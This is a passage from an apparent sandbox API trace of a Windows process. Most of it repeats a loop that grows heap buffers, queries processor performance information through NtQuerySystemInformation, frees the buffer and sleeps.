hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.548] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.548] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.548] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.549] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.550] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.550] Sleep (dwMilliseconds=0x110) [0236.564] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.564] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.565] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.565] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.565] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.565] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.566] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.566] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.567] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.567] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.568] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.568] Sleep (dwMilliseconds=0x110) [0236.579] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.579] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.580] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.580] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.581] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.581] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.582] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.582] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.582] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.582] Sleep (dwMilliseconds=0x110) [0236.595] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.595] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.596] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.596] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.597] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.597] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.597] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.597] Sleep (dwMilliseconds=0x110) [0236.606] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.606] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.607] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.611] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.612] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.612] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.613] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.613] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.614] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.615] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.615] Sleep (dwMilliseconds=0x110) [0236.626] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.626] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.628] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.628] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.629] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.629] Sleep (dwMilliseconds=0x110) [0236.641] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.641] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.642] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.643] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.643] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.644] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.644] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.644] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.645] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.645] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.645] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.645] Sleep (dwMilliseconds=0x110) [0236.654] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.654] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.655] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.655] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.655] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.656] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.656] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.656] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.657] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.657] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.657] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.658] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.658] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.659] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.659] Sleep (dwMilliseconds=0x110) [0236.669] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.669] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.670] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.670] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.671] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.672] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.672] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.672] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.673] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.673] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.673] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.673] Sleep (dwMilliseconds=0x110) [0236.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.690] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.692] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.692] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.692] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.693] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.693] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.693] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.694] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.694] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.694] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.695] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.696] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.697] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.697] Sleep (dwMilliseconds=0x110) [0236.706] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.707] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.707] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.707] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.707] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.708] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.708] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.708] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.709] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.713] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.713] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.713] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.713] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.714] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.714] Sleep (dwMilliseconds=0x110) [0236.716] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.716] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.716] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.717] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.719] Sleep (dwMilliseconds=0x110) [0236.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.737] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.738] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.738] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.738] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.738] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.738] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.738] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.739] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.739] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.740] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.740] Sleep (dwMilliseconds=0x110) [0236.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.752] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.753] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.754] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.754] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.755] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.755] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.755] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.756] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.756] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.757] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.757] Sleep (dwMilliseconds=0x110) [0236.763] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 